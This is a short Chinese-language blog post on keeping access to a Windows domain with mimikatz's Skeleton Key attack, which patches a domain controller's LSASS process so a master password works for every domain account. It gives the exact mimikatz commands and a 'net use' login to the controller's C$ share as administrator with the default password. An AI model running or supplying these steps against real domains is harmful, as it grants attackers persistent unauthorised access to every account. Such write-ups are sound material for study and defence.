域权限维持:Skeleton Key

参考作者:遗忘

0X01介绍

Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003到Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录,现有的所有域用户使用原密码仍能继续登录,注意并不能更改用户权限,这里需要注意的是重启将失效。

0X02步骤:

mimikatz的MISC::Skeleton,在 DC 中注入万能钥匙(Skeleton Key) 到 LSASS 进程中。这使得所有用户所使用的万能钥匙修补DC使用"主密码” (又名万能钥匙)以及他们自己通常使用的密码进行身份验证。

1、mimikaz执行命令:privilege::debug misc::skeleton

2、mimikatz的默认Skeleton Key设置为mimikatz(坑点:使用主机名链接)
net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"

posted @ 2019-11-15 12:45  zpchcbd  阅读(668)  评论(0编辑  收藏  举报